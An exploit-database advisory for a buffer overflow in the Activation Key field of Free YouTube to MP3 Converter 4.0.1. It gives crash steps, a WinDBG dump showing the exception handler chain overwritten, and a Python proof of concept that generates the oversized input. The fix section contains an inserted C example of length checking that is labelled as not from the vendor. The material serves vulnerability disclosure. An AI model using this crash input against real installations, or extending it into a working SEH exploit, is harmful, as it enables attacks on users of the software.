Free-YouTube-To-MP3-Converter 4.0.1 - Buffer Overflow Vulnerability

2015-10-10T00:00:00
ID 1337DAY-ID-24393
Type zdt
Reporter ZwX
Modified 2015-10-10T00:00:00

Description

FreeYouTubeToMP3 Converter version 4.0.1 suffers from a buffer overflow vulnerability.

 -----------------------------------------------------
 Exploit Title : Free-YouTube-To-MP3-Converter - Buffer Overflow Vulnerability
 Date : 28/09/2015
 Exploit Author : ZwX
 Software Vendor : https://www.dvdvideosoft.com
 Software Link: http://apps.dvdvideosoft.com/fr/downloadSource/FreeYouTubeToMP3Converter.exe
 Version: 4.0.1
 Tested on: Windows 7
 -----------------------------------------------------

 ---------------------------
 * Solution - Fix & Patch: *
 ---------------------------

 - Restrict the number of characters accepted in the Activation Key input field, so that the submitted key is rejected before it is copied into a fixed-size buffer.
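The following is an added example of the fix the advisory recommends; it is not DVDVideoSoft's code and the product's source is not public. It enforces a maximum key length before the submitted Activation Key is copied into a fixed-size buffer, so an over-long input is refused instead of overwriting the stack. The buffer capacity (KEY_BUF_SIZE), the accepted character set, and the helper names are assumptions made for illustration; the 8538 + 12 byte test input mirrors the sizes used in the advisory's PoC.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not the vendor's code. The advisory's fix is to limit the
 * number of characters accepted in the Activation Key field; this enforces
 * that limit before anything is copied into a fixed-size buffer. The buffer
 * size and the accepted character set are assumptions for illustration. */

#define KEY_BUF_SIZE 64   /* assumed capacity of the key buffer, including NUL */

enum key_status { KEY_OK = 0, KEY_EMPTY, KEY_TOO_LONG, KEY_BAD_CHAR };

/* Length scan that never reads past 'max' bytes, so an unterminated or
 * oversized input is reported as too long instead of being read to its end. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Validate the submitted key and copy it into dst only if it fits.
 * dst_size is the full capacity of dst; the copy never exceeds it. */
enum key_status store_activation_key(const char *input, char *dst, size_t dst_size)
{
    if (dst_size == 0)
        return KEY_TOO_LONG;
    size_t len = bounded_len(input, dst_size);
    if (len == 0)
        return KEY_EMPTY;
    if (len >= dst_size)              /* must leave room for the terminator */
        return KEY_TOO_LONG;
    for (size_t i = 0; i < len; i++) {   /* assumed format: A-Z, 0-9 and '-' */
        char c = input[i];
        if (!((c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '-'))
            return KEY_BAD_CHAR;
    }
    memcpy(dst, input, len);
    dst[len] = '\0';
    return KEY_OK;
}

/* Run one input through a fixed-size stack buffer and report the verdict. */
enum key_status check_key(const char *input)
{
    char key[KEY_BUF_SIZE];
    return store_activation_key(input, key, sizeof key);
}

/* Constructed input with the same sizes as the advisory's PoC: 8538 'A'
 * bytes followed by 12 'B' bytes. With the length check in place it is
 * rejected before any copy takes place. */
enum key_status check_poc_sized_key(void)
{
    static char poc[8538 + 12 + 1];
    memset(poc, 'A', 8538);
    memset(poc + 8538, 'B', 12);
    poc[8538 + 12] = '\0';
    return check_key(poc);
}

int main(void)
{
    printf("short key : %d\n", check_key("ABCD-1234-EFGH"));   /* 0 = KEY_OK */
    printf("empty key : %d\n", check_key(""));                 /* 1 = KEY_EMPTY */
    printf("lowercase : %d\n", check_key("abcd"));             /* 3 = KEY_BAD_CHAR */
    printf("PoC-sized : %d\n", check_poc_sized_key());         /* 2 = KEY_TOO_LONG */
    return 0;
}
```

The length check runs before the character-set check, so the PoC-sized string is refused on size alone even though it consists of characters the assumed format allows. Passing the destination capacity explicitly (rather than relying on a terminator in the input) is what keeps the copy bounded regardless of what the caller supplies.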

 --------------------------------
  * Steps to Produce the Crash: *
 --------------------------------

 - 1. Run Free-YouTube-To-MP3-Converter.exe
 - 2. Copy the AAAA... string from bof.txt to the clipboard
 - 3. Go to Menu -> Tools -> Options
 - 4. Paste the AAAA... string into the Activation Key field and click Activate
 - 5. The software will crash.

 --------------------------------
 * Crash Analysis using WinDBG: *
 --------------------------------

 Access violation - code c0000005 (!!! second chance !!!)
 eax=00316a30 ebx=41414141 ecx=41414141 edx=00000000 esi=00316a30 edi=00000000
 eip=779071b4 esp=003169cc ebp=00316a1c iopl=0         nv up ei pl nz na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
 ntdll!KiFastSystemCallRet:
 779071b4 c3              ret
 0:000> !exchain
 00319484: 41414141
 Invalid exception stack at 41414141
 0:000> d 00319484
 00319484  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 00319494  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194a4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194b4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194c4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194d4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194e4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 003194f4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 0:000> kb
 ChildEBP RetAddr  Args to Child
 WARNING: Stack unwind information not available. Following frames may be wrong.
 001e6a5c 776db2e6 001e6a70 001e6ac0 00000000 ntdll!KiFastSystemCallRet
 001e6d90 776b0844 41414141 fffffffe fffffffe ntdll!RtlRemoteCall+0x236
 001e6de0 7763f9be 41414141 0000004d 001e94b4 ntdll!EtwSetMark+0x14bea
 001e6e60 77667117 001e6e78 001e6e94 001e6e78 ntdll!RtlGetGroupSecurityDescriptor+0x2b2
 001e9334 41414141 41414141 41414141 41414141 ntdll!KiUserExceptionDispatcher+0xf
 001e9338 41414141 41414141 41414141 41414141 0x41414141

 ------------------------
   * Proof Of Concept *
 ------------------------

buffer = "\x41" * 8538   # 8538 bytes of 'A' (0x41) to fill the input buffer
seh = "\x42" * 12        # 12 bytes of 'B' (0x42) appended after the padding

# Write the crash string to bof.txt; it is pasted into the Activation Key field.
with open("bof.txt", "w") as f:
    f.write(buffer + seh)

print("POC Created by ZwX")
print(" Email: [email protected]")

#  0day.today [2018-02-16]  #